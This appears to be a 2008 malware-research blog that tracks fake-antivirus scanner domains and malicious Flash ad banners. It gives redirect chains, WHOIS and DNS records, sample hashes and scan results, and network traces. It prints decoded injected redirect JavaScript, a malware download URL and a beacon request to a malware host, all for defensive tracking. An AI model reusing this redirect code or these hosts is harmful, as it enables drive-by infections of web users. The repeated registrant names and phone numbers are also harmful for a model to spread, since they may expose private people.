~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: aqtravel.info
Connection: Keep-Alive

HTTP/1.1 302
FoundDate: Tue, 29 Jul 2008 16:12:16 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
Location: http://scanning-computer-online.com/1/?xx=1&in=2&ag=2&end=1&g=1&affid=401&lid=103
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;

charset=iso-8859-1163<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://scanning-computer-online.com/1/?xx=1&in=2&ag=2&end=1&g=1&affid=401&lid=103">here</A>.<P>
<HR>
<ADDRESS>Apache/1.3.39 Server at aqtravel.info Port 80</ADDRESS>
</BODY></HTML>

______________________________

chocolatgirl.50webs.com/description/lame-enc.html

The page contains an obfuscated javascript.

Once decoded we obtain a link to lineacount.info/cgi-bin/counter?id=133722&ref=

CODE

document.write('<sc'+'ript src="http://lineacount.info/cgi-bin/counter?id=133722&ref='+escape(document.referrer)+'"></sc'+'ript>')

At lineacount.info we again fall on an obfuscated script.

Decoded it leads to scan.wsp2008scanner.com/263/509/

CODE

document.write('<sc'+'ript> document.location="http://scan.wsp2008scanner.com/263/509/" </sc'+'ript>');

______________________________

gogele.com

gogele.com redirects to landing.trafficz.com/index.php?domain=gogele.com where we get an advertising popup upon entering the website. If you are unlucky, you will get redirected to some fake online scanner. Some examples are described here.
______________________________

bull.s11.x-beat.com/src/bull124569.gif

I'm redirected to an adult website at the time of the write-up. Exploits are possible on such websites.

<h4></h4>
Website Title: None given.
Created: 2007-06-25
Expires: 2009-06-25
Updated: 2008-06-26
Whois Server: whois.afilias.info
IP Location - United Kingdom - Real International Business Corp

Domain ID:D18657023-LRMS
Domain Name:AQTRAVEL.INFO
Created On:25-Jun-2007 19:57:38 UTC
Last Updated On:26-Jun-2008 10:26:02 UTC
Expiration Date:25-Jun-2009 19:57:38 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:OK
Registrant ID:DI_6401114
Registrant Name:eric peeters
Registrant Organization:N/A
Registrant Street1:stationstraat 87
Registrant Street2:
Registrant Street3:
Registrant City:gent
Registrant State/Province:Oost-Vlaanderen(nl)
Registrant Postal Code:9030
Registrant Country:BE
Registrant Phone:+32.0484659841
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:DI_6401114
Admin Name:eric peeters
Admin Organization:N/A
Admin Street1:stationstraat 87
Admin Street2:
Admin Street3:
Admin City:gent
Admin State/Province:Oost-Vlaanderen(nl)
Admin Postal Code:9030
Admin Country:BE
Admin Phone:+32.0484659841
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Billing ID:DI_6401114
Billing Name:eric peeters
Billing Organization:N/A
Billing Street1:stationstraat 87
Billing Street2:
Billing Street3:
Billing City:gent
Billing State/Province:Oost-Vlaanderen(nl)
Billing Postal Code:9030
Billing Country:BE
Billing Phone:+32.0484659841
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:
Tech ID:DI_6401114
Tech Name:eric peeters
Tech Organization:N/A
Tech Street1:stationstraat 87
Tech Street2:
Tech Street3:
Tech City:gent
Tech State/Province:Oost-Vlaanderen(nl)
Tech Postal Code:9030
Tech Country:BE
Tech Phone:+32.0484659841
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:
Name Server:NS0.HQHOST.NET
Name Server:NS1.HQHOST.NET

Websites.

1. Amateur-porn-links.com
2. Aqtravel.info
3. Atona.org
4. Bannergs.info
5. Bez-piva.net
6. Boob-porn.net
7. Boobgayporn.net
8. Changefuture.net
9. Cheryclub.com
10. Cheryclub.org
11. Digimon-hentai.org
12. Easyrial.com
13. Funsjoy.org
14. Gainrich.net
15. Geotem.info
16. Gigonly.info
17. Givedata.com
18. Google-defloration.com
19. Gps-sat-position.com
20. Helpmothers.net
21. Hlth-care.com
22. Hostel-young.com
23. Intop20.net
24. Isellbody.com
25. Korkas.org
26. Ku4a.com
27. Kupola-ua.com
28. Lesbian-adult.net
29. Lesbiangayadult.net
30. Lyudmila.net
31. Mainsearch.biz
32. Millioncent.com
33. Myliras.org
34. Naqtravel.com
35. Nude-adult.net
36. Nudegayadult.net
37. Oblojka.biz
38. Okolonet.com
39. Paris-young.com
40. Pornjokers.com
41. Rington-city.com
42. Russtandart.com
43. Saveage.info
44. Search-insurance.com
45. Seopetersburg.com
46. Skrepka.org
47. Softseo.net
48. Start-porn.net
49. Startgayporn.net
50. Tablets-city.com
51. Teens-master.com
52. Telescope-off.com
53. Tits-adult.net
54. Titsgayadult.net
55. Tooeasycash.com
56. Webikweb.info
57. Xfaktorz.org
58. Xxx-nude.net
59. Xxxgaynude.net
60. Yourrial.com

<h4></h4>
Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-04
Expires: 2009-07-04
Updated: 2008-07-04
Name Server: NS1.MYNICK.NAME (has 931 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com
IP Location - United Kingdom - Isp Uatelecom Llc

Domain Name: SCANNING-COMPUTER-ONLINE.COM

Creation Date: 04-Jul-2008
Expiration Date: 04-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764

Administrative Contact:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764

Technical Contact:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764

Billing Contact:
TORS BUISINESS LIMITED
Andreas Ellinas ()
Suite 2, Portland House, Glacis Road,
Gibraltar
Not Applicable,220174
GI
Tel. +375.296324764

Websites.

1. Antivirus-pc-scanner.com
2. Buy-secure-protection.com
3. Fast-pc-scanner-online.com
4. Full-protection-now.com
5. Get-full-protection.com
6. Get-protected-now.com
7. Make-pc-secure-now.com
8. Online-pc-scanner.com
9. Online-scanning-computer.com
10. Pc-antivirus-scanner.com
11. Pc-scanner-online.com
12. Scanning-computer-online.com
13. Secure-pc-protection.com
14. Top-pc-scanner.com

<h4></h4>
Website Title: None given.
Created: 2007-05-03
Expires: 2009-05-03
Updated: 2008-06-19
Whois Server: whois.afilias.info

Server Type: Apache/1.3.31 (Unix) mod_python/2.7.10 Python/2.2.2 mod_webapp/1.2.0-dev mod_perl/1.29 mod_throttle/3.1.2 PHP/4.3.8 FrontPage/5.0.2.2510 mod_ssl/2.8.18 OpenSSL/0.9.7d
IP Location - Ukraine - Ukrtelegroup Ltd

Domain ID:D17629058-LRMS
Domain Name:LINEACOUNT.INFO
Created On:03-May-2007 11:59:52 UTC
Last Updated On:19-Jun-2008 14:04:36 UTC
Expiration Date:03-May-2009 11:59:52 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:OK
Registrant ID:DI_6310930
Registrant Name:Byron Hadley
Registrant Organization:N/A
Registrant Street1:Hornindal
Registrant Street2:
Registrant Street3:
Registrant City:Hornindal
Registrant State/Province:Not Applicable
Registrant Postal Code:6763
Registrant Country:NO
Registrant Phone:+47.57879605
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:DI_6310930
Admin Name:Byron Hadley
Admin Organization:N/A
Admin Street1:Hornindal
Admin Street2:
Admin Street3:
Admin City:Hornindal
Admin State/Province:Not Applicable
Admin Postal Code:6763
Admin Country:NO
Admin Phone:+47.57879605
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Billing ID:DI_6310930
Billing Name:Byron Hadley
Billing Organization:N/A
Billing Street1:Hornindal
Billing Street2:
Billing Street3:
Billing City:Hornindal
Billing State/Province:Not Applicable
Billing Postal Code:6763
Billing Country:NO
Billing Phone:+47.57879605
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:
Tech ID:DI_6310930
Tech Name:Byron Hadley
Tech Organization:N/A
Tech Street1:Hornindal
Tech Street2:
Tech Street3:
Tech City:Hornindal
Tech State/Province:Not Applicable
Tech Postal Code:6763
Tech Country:NO
Tech Phone:+47.57879605
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:
Name Server:NS1.LINEACOUNT.INFO
Name Server:NS2.LINEACOUNT.INFO

Websites.

1. 30g60.info
2. 4martina.info
3. 5mercant.info
4. Adikmoz.info
5. Adoremio.info
6. Ail-mati.info
7. Alupeso.info
8. Arbu4i.info
9. Asterkop.info
10. Atipero.info
11. Bonsita.info
12. Boureus.info
13. Buffbarr.info
14. Chestnut8.info
15. Chibasa.info
16. Chineseb.info
17. Chobitsu.info
18. Clopdi.info
19. Collared.info
20. Commonst.info
21. Counterpoints.info
22. Creazapa.info
23. Crendol.info
24. Dolosyto.info
25. Doormoi.info
26. Epagina-89.info
27. Essquell.info
28. Estewess.info
29. Fer2go.info
30. Gaibanet.info
31. Garcita.info
32. Gebvalle.info
33. Genuero.info
34. Gigantiko.info
35. Glecerisca.info
36. Grecesco.info
37. Grengo.info
38. Hulista.info
39. Iledetu.info
40. Jamento.info
41. Jason-b8.info
42. Jelitaro.info
43. Juncite.com
44. Keichita.info
45. Kitankon.info
46. Klaudiu5.info
47. Kodonomo.info
48. Kooletsrc.info
49. Krezetta.info
50. Lamini9.info
51. Laritanh.info
52. Lativardo.info
53. Lavilo.info
54. Leposit.info
55. Lineacount.info
56. Livila.info
57. Lolat.info
58. Lopitarsite.info
59. Maderalti.info
60. Madorut.info
61. Makotyan.info
62. Mambito.info
63. Man4ito.info
64. Manovar13.info
65. Matiusfor.info
66. Mentarka.info
67. Miaredo.info
68. Miracloof.info
69. Moburic.info
70. Montazo.info
71. Moruandre.info
72. Oledeto.info
73. Palerdoz.info
74. Pricalca.info
75. Qutipart.info
76. Regackt.info
77. Renmeik.info
78. Saimour-man.info
79. Sentaf.info
80. Serinity.info
81. Snaceslot.info
82. Solsilke.info
83. Termig1.info
84. Trust-pag.info
85. Unmarine.info
86. Uresagi.info
87. Weranda.info
88. Werterta.info
89. Windolin.info
90. Wvvw-pagine.info
91. Zoisait.info

<h4></h4>
Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-07-23
Expires: 2009-07-23
Updated: 2008-07-23
Name Server: NS1.EVERYDNS.NET (has 93,672 domains)
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Whois Server: whois.estdomains.com

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: WSP2008SCANNER.COM

Registrant:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284

Creation Date: 23-Jul-2008
Expiration Date: 23-Jul-2009

Domain servers in listed order:
ns4.everydns.net
ns3.everydns.net
ns2.everydns.net
ns1.everydns.net

Administrative Contact:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284

Technical Contact:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284

Billing Contact:
Gorelik
Nicole Renaissance ()
General Conti str.
New York
New York,77102
US
Tel. +001.3328439284
Fax. +001.3328439284

<h4></h4>
Couple of newcomers in the Still Trade Ltd block. See softtraf.com

91.208.0.233

*.power-antivirus-2009.com CNAME
mail.power-antivirus-2009.com A
ns1.power-antivirus-2009.com A
ns2.power-antivirus-2009.com A
power-antivirus-2009.com A
scanner.power-antivirus-2009.com CNAME

91.208.0.234

*.win-antivir-2008.com CNAME
mail.win-antivir-2008.com A
ns1.win-antivir-2008.com A
ns2.win-antivir-2008.com A
win-antivir-2008.com A

91.208.0.236

*.vit-x-scanner.com CNAME
mail.vit-x-scanner.com A
ns1.vit-x-scanner.com A
ns2.vit-x-scanner.com A
vit-x-scanner.com A
www.vit-x-scanner.com CNAME

91.208.0.238

*.spywatchepromo.com CNAME
ns1.spywatchepromo.com A
spywatchepromo.com A

91.208.0.240

*.anvimaster.com CNAME
anvimaster.com A
mail.anvimaster.com A
ns1.anvimaster.com A
scanner.anvimaster.com CNAME

91.208.0.241

*.privacy-watcher.com CNAME
ns1.privacy-watcher.com A
ns1.winsafer.com A
privacy-watcher.com A
scanner.privacy-watcher.com CNAME
winsafer.com A

91.208.0.243

*.malwscan.com CNAME
*.shredder-scan.com CNAME
malwscan.com A
ns1.malwscan.com A
ns1.shredder-scan.com A
shredder-scan.com A

91.208.0.244

*.softtraf.com CNAME
*.softtrafik.com CNAME
mail.softtraf.com A
mail.softtrafik.com A
ns1.softtraf.com A
ns1.softtrafik.com A
softtraf.com A
softtrafik.com A

91.208.0.246

*.vav-scan.com CNAME
*.vav-x-scanner.com CNAME
*.vavscan.com CNAME
mail.vav-scan.com A
mail.vav-x-scanner.com A
mail.vavscan.com A
ns1.vav-scan.com A
ns1.vav-x-scanner.com A
ns1.vavscan.com A
ns2.vav-scan.com A
ns2.vav-x-scanner.com A
ns2.vavscan.com A
scanner.vav-scan.com CNAME
scanner.vav-x-scanner.com CNAME
vav-scan.com A
vav-x-scanner.com A
vavscan.com A
www.vav-scan.com CNAME

91.208.0.250

ns2.winxprotector.com A

91.208.0.252

*.anvi-scanner.com CNAME
anvi-scanner.com A
mail.anvi-scanner.com A
ns1.anvi-scanner.com A
ns2.anvi-scanner.com A
scanner.anvi-scanner.com CNAME

91.208.0.253

*.win-antivirus-2008.com CNAME
mail.win-antivirus-2008.com A
ns1.win-antivirus-2008.com A
ns2.win-antivirus-2008.com A
win-antivirus-2008.com

<h4></h4>
Myspace.com is hit again by a malicious Flash banner. More info at FaceTime Security Labs.

The victims are redirected to antispywaremaster.com as seen on the screenshot. Antispywaremaster.com has been mentioned on several occasions by me & Sandi. Not long ago we say a banner redirecting to them on screensavers.com. ForceUp behind it again? Sandi did mention them a couple of days ago on her blog.

<h4></h4>
Couple more from that same block.

91.208.0.235

Free-host4u.com

91.208.0.237

First-reason.com

91.208.0.239

Winxsecuritycenter.com

91.208.0.242

Blog-antivirus.com
Spyware-blog.com

91.208.0.245

Malware-scan.com
Xmalware-scan.com

91.208.0.247

Softsellout.com
Webspyshield.com

91.208.0.248

Malware-scanner.com
Shredder-scanner.com

91.208.0.249

Defender-scan.com
Watcher-scan.com

91.208.0.251

Win-x-defender.com
Win-x-defenders.com

91.208.0.254

Vistaguard.com

<h4></h4>
adtds.trackads.net / adtds2.promoplexer.com have activated a new domain: global-advers.com

global-advers.com/soft.php?aid=0639&d=3&product=XPA

Depending on the parameters people will get redirected to different fake online scanners. I got redirected to

windows-scannernv.com/2008/3/freescan.php?aid=880639

global-advers.com - 89.149.226.24

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-30
Expires: 2009-07-30
Updated: 2008-07-30
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 897 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k

Whois Record
Domain Name: GLOBAL-ADVERS.COM

Creation Date: 30-Jul-2008
Expiration Date: 30-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
______________________________

windows-scannernv.com - 89.149.226.24

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-22
Expires: 2009-07-22
Updated: 2008-07-22
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 897 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k

Whois Record
Domain Name: WINDOWS-SCANNERNV.COM

Creation Date: 22-Jul-2008
Expiration Date: 22-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Other Websites.

antivirus-2009pro.com A
antivirus-database.com A
antivirus2009professional.com A
securityscannersite.com A
spywareonlinescanner.com A
vps014.vserver4free.de PTR A
windows-internet-scanner.com A
windows-scannernv.com A
www.antivirus2009professional.com CNAME

<h4></h4>
*Sigh* .... another of those sneaky little Flash files - 1,394 bytes -. This time an executable is downloaded on the PC from www.plgou.com.

Don't visit the site, there are different exploits present and you could encounter them on any website as they are used in sql injections. Apparently a user has been hit on my.yahoo according to Sandi's blog. A Google search on "jjmaobuduo.3322.org/csrss/w.js" reveals already a high number of affected websites.
______________________________

Filename: i47.swf

File size: 1394 bytes
MD5...: b3a302976d5d76a6d28e210b22e535a6
SHA1..: 969935f8367fd738df12b10457897499af4a4b2a
SHA256: f06ff8eb3f3243a3ae0697c3943c8af82ccbbd1381a0c9aef2fdce615ac40b0d
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE

File i47.swf received on 08.07.2008 07:45:31
AhnLab-V3 2008.8.7.0 2008.08.07 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.19 2008.08.06 EXP/Flash.Gen
Authentium 5.1.0.4 2008.08.07 -
Avast 4.8.1195.0 2008.08.06 SWF:CVE-2007-0071
AVG 8.0.0.156 2008.08.06 -
BitDefender 7.2 2008.08.07 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.08.06 SWF.Exploit
ClamAV 0.93.1 2008.08.07 -
DrWeb 4.44.0.09170 2008.08.07 -
eSafe 7.0.17.0 2008.08.06 -
eTrust-Vet 31.6.6016 2008.08.06 -
Ewido 4.0 2008.08.06 -
F-Prot 4.4.4.56 2008.08.06 -
F-Secure 7.60.13501.0 2008.08.07 -
Fortinet 3.14.0.0 2008.08.07 -
GData 2.0.7306.1023 2008.08.07 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.08.07 -
K7AntiVirus 7.10.405 2008.08.06 -
Kaspersky 7.0.0.125 2008.08.07 -
McAfee 5355 2008.08.06 -
Microsoft 1.3807 2008.08.07 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3335 2008.08.07 -
Norman 5.80.02 2008.08.06 -
Panda 9.0.0.4 2008.08.06 -
PCTools 4.4.2.0 2008.08.06 -
Prevx1 V2 2008.08.07 -
Rising 20.56.30.00 2008.08.07 -
Sophos 4.31.0 2008.08.07 Exp/SWFScene-A
Sunbelt 3.1.1537.1 2008.08.07 -
Symantec 10 2008.08.07 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.07 -
VBA32 3.12.8.2 2008.08.06 -
ViRobot 2008.8.6.1326 2008.08.06 -
VirusBuster 4.5.11.0 2008.08.06 -
Webwasher-Gateway 6.6.2 2008.08.06 Exploit.Flash.Gen

______________________________

rondll32.exe

File size: 29244 bytes
MD5...: 68ba2b52c10841ea3d3e5d0982f647d8
SHA1..: 1fadf7e63621f5c60246759a0392203451ec6fd7
SHA256: 4315e62ec430fcc7820b95dcbdd780f210e1b55f188d56281c309d08208dc702
PEiD..: -

QUOTE

File rondll32.exe received on 08.07.2008 07:46:26
AhnLab-V3 2008.8.7.0 2008.08.07 -
AntiVir 7.8.1.19 2008.08.06 TR/Dropper.Gen
Authentium 5.1.0.4 2008.08.07 W32/Heuristic-210!Eldorado
Avast 4.8.1195.0 2008.08.06 -
AVG 8.0.0.156 2008.08.06 SHeur.CAWE
BitDefender 7.2 2008.08.07 -
CAT-QuickHeal 9.50 2008.08.06 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.07 PUA.Packed.UPack-2
DrWeb 4.44.0.09170 2008.08.07 MULDROP.Trojan
eSafe 7.0.17.0 2008.08.06 Suspicious File
eTrust-Vet 31.6.6016 2008.08.06 -
Ewido 4.0 2008.08.06 -
F-Prot 4.4.4.56 2008.08.06 W32/Heuristic-210!Eldorado
F-Secure 7.60.13501.0 2008.08.07 W32/Suspicious_U.gen
Fortinet 3.14.0.0 2008.08.07 -
GData 2.0.7306.1023 2008.08.07 Backdoor.Win32.Small.flb
Ikarus T3.1.1.34.0 2008.08.07 Trojan-Dropper
K7AntiVirus 7.10.405 2008.08.06 -
Kaspersky 7.0.0.125 2008.08.07 Backdoor.Win32.Small.flb
McAfee 5355 2008.08.06 New Malware.aj
Microsoft 1.3807 2008.08.07 -
NOD32v2 3335 2008.08.07 -
Norman 5.80.02 2008.08.06 W32/Suspicious_U.gen
Panda 9.0.0.4 2008.08.06 Suspicious file
PCTools 4.4.2.0 2008.08.06 Packed/Upack
Prevx1 V2 2008.08.07 Malicious Software
Rising 20.56.30.00 2008.08.07 -
Sophos 4.31.0 2008.08.07 Mal/Packer
Sunbelt 3.1.1537.1 2008.08.07 VIPRE.Suspicious
Symantec 10 2008.08.07 Trojan Horse
TheHacker 6.2.96.393 2008.08.04 W32/Behav-Heuristic-060
TrendMicro 8.700.0.1004 2008.08.07 PAK_Generic.006
VBA32 3.12.8.2 2008.08.06 -
ViRobot 2008.8.6.1326 2008.08.06 -
VirusBuster 4.5.11.0 2008.08.06 Packed/Upack
Webwasher-Gateway 6.6.2 2008.08.06 Trojan.Dropper.Gen

ThreatExpert Report.
______________________________

plgou.com - 121.11.76.85

Domain Name: PLGOU.COM
Registrar: ENAME, INC
Whois Server: whois.ename.com
Referral URL: http://www.ename.com
Name Server: NS1.ENAME.CN
Name Server: NS2.ENAME.CN
Name Server: NS3.ENAME.CN
Name Server: NS4.ENAME.CN
Name Server: NS5.ENAME.CN
Name Server: NS6.ENAME.CN
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 10-mar-2008
Creation Date: 17-feb-2008
Expiration Date: 17-feb-2009

<h4></h4>
Nancy Drew Solves Mysteries In Style ... whoops ... maybe we should say Nancy Drew Hijacks In Style instead. And this time no redirect to a fake online scanner but an executable. The pest is nifty to remove btw as it belongs to the Vundo family.

Banner.

Redirect.

82.98.235.173/ex3/i.exe

______________________________

Filename: i.exe

File size: 34816 bytes
MD5...: 01511e9da4f526b2b44f772c62b2bedd
SHA1..: 6686169f7240c81bdbe888b3136771317907b657
SHA256: ee374db6872205044a8a8cb518d881b6d9553d10e333329cf8cb709291008102
PEiD..: -

QUOTE

File i.exe received on 08.08.2008 00:43:41
AhnLab-V3 2008.8.8.0 2008.08.07 -
AntiVir 7.8.1.19 2008.08.07 -
Authentium 5.1.0.4 2008.08.07 -
Avast 4.8.1195.0 2008.08.07 Win32:Trojan-gen {Other}
AVG 8.0.0.156 2008.08.07 SHeur.BZCG
BitDefender 7.2 2008.08.07 -
CAT-QuickHeal 9.50 2008.08.07 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.07 -
DrWeb 4.44.0.09170 2008.08.07 -
eSafe 7.0.17.0 2008.08.07 Suspicious File
eTrust-Vet 31.6.6018 2008.08.07 -
Ewido 4.0 2008.08.07 -
F-Prot 4.4.4.56 2008.08.07 -
F-Secure 7.60.13501.0 2008.08.07 -
Fortinet 3.14.0.0 2008.08.07 -
GData 2.0.7306.1023 2008.08.07 Win32:Trojan-gen
Ikarus T3.1.1.34.0 2008.08.07 Virus.Win32.Trojan
K7AntiVirus 7.10.407 2008.08.07 -
Kaspersky 7.0.0.125 2008.08.08 -
McAfee 5356 2008.08.07 -
Microsoft 1.3807 2008.08.08 -
NOD32v2 3338 2008.08.07 -
Norman 5.80.02 2008.08.06 -
Panda 9.0.0.4 2008.08.07 -
PCTools 4.4.2.0 2008.08.07 -
Prevx1 V2 2008.08.08 Malicious Software
Rising 20.56.32.00 2008.08.07 Packer.Win32.Mian007.a
Sophos 4.32.0 2008.08.07 -
Sunbelt 3.1.1537.1 2008.08.07 -
Symantec 10 2008.08.08 -
TheHacker 6.2.96.394 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.07 -
VBA32 3.12.8.3 2008.08.07 -
ViRobot 2008.8.7.1328 2008.08.07 -
VirusBuster 4.5.11.0 2008.08.07 -
Webwasher-Gateway 6.6.2 2008.08.07 Win32.Malware.gen!90 (suspicious)

ThreatExpert Report.

Addendum to the ThreatExpert report.

Visible Signs.

O4 - HKCU\..\Run: [A00F25D34.exe] C:\DOCUME~1\KLY\LOCALS~1\Temp\_A00F25D34.exe
O20 - Winlogon Notify: __c005C86E - C:\WINDOWS\system32\__c005C86E.dat

When Internet Explorer is opened, __c005C86E.dat tries to download additional stuff from nx1.todaystats.com using a special User Agent but as seen in the network capture, we get a 404 error for the time being.

CODE

GET /?a=4011&t=[removed]/[removed]=&f=0 HTTP/1.1
User-Agent: MSIE
Host: nx1.todaystats.com
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Date: Fri, 08 Aug 2008 04:03:59 GMT
Connection: close

______________________________

82.98.235.173

Whois Record
inetnum: 82.98.235.0 - 82.98.235.255
netname: CYBERTECHNOLOGY
descr: Cyber Technology BV BA/SPRL
descr: Belgium
country: NL
admin-c: OVL3-RIPE
tech-c: OVL3-RIPE
status: ASSIGNED PA
remarks: *******************************************
remarks: * Abuse contact: *
remarks: *******************************************
mnt-by: ABOVENET-P
mnt-lower: ABOVENET-P
mnt-routes: ABOVENET-P
source: RIPE # Filtered

person: Oliver van Loven
address: Cyber Technology BVBA/SPRL
address: 164 rue emile dury
address: 1410 Waterloo Brussels
address: Belgium
e-mail:
phone: +32 2 479 87 16
fax-no: +32 2 479 87 16
mnt-by: ABOVENET-P
nic-hdl: OVL3-RIPE
source: RIPE # Filtered
______________________________

nx1.todaystats.com - 82.98.193.167 & 82.98.193.18
todaystats.com - 62.4.84.4

<h4></h4>
Courtesy of Sandi.

E*Trade Financial (etrade.com).

Campaign.

stathome.net/c/index.php?id=[removed]
profitabill.com/?cmpid=responsein&adid=intl

More info.

<h4></h4>
A new malvertizement is being served on 123greetings.com featuring BigHip Email Marketing Solutions. Fuse Kit 2.1.4. was used for this creative.

Screenshot in situ.

Banner.

imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/Servedad_LB_11137A/big_hip_01_728x90.swf

Campaign.

openadstream.net/stat.gif?url=[removed]

At the time of the write-up the full redirect was inactive. Adopstools was not able to analyse the malicious banner.

<h4></h4>
The BigHip malvertizement discovered less than 24h ago on 123greetings.com *might* eventually be displayed at forbes.com, everything does of course depend on how long some advertisements are being actively used. The malicious banner is present on their server as seen below.

Screenshot.

Banner.

images.forbes.com/ads/BigHip/New.swf

Campaign.

openadstream.net/stat.gif?url=[removed]

The redirect is identical as the one from 123greetings.com. At the time of the write-up the full redirect was inactive.

Flash banner properties.

Using wget, the flash file has a date stamp from July 11 2008. Until further notice I would recommend extreme caution upon visiting forbes.com

Network Trace.

CODE

GET http://openadstream.net/stat.gif?url=[removed] HTTP/1.1
Accept: */*
Referer: http://images.forbes.com/ads/BigHip/New.swf
x-flash-version: 9,0,47,0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla

______________________________

On a lighter note, the advertising campaign on 123greetings.com has been suspended earlier today. Ref.

<h4></h4>
A while back we saw that folder names in URL's can reveal interesting things, cf ReachWe. When I looked at the URL leading to the BigHip advertisement, I knew I already saw Servedad somewhere ...

BigHip.

imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/Servedad_LB_11137A/big_hip_01_728x90.swf

Link.

Forex AutoPilot.

image.ifrance.com/img/pub/servedad/forexautopilot_728x90.swf

Link.

Sandi did mention an advertisement for American Singles in June. I noticed the advertisement on 123greetings.com a couple of weeks ago but they were displaying the gif file and not the flash file. The link leading to the banner was also wearing the mention servedad and hosted by RealMedia. Even by changing the link a little bit I was unable to discover the Flash version of this advertisement. Maybe it had been pulled out already.

Served Ad - www.servedad.net

Don't bother clicking on the links, they don't work and all lead to the same page. If you have creatives from Served Ad, check them out at Adopstools. A warning about Served Ad being involved in malware is also displayed at Spam Laws.

Why am I not a bit surprised that www.servedad.net is registered by the infamous EstDomains ...

Website Title: Served Ad
Registry Data
ICANN Registrar: ESTDOMAINS, INC.
Created: 2007-06-24
Expires: 2009-06-24
Updated: 2008-06-23
Registrar Status: ok
Name Server: MANAGEDNS1.ESTBOXES.COM (has 7,769 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

Server Type: Apache/2.2.3 (CentOS)
IP Address: 216.195.62.78
IP Location - California - San Anselmo - Aps Telecom

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: SERVEDAD.NET

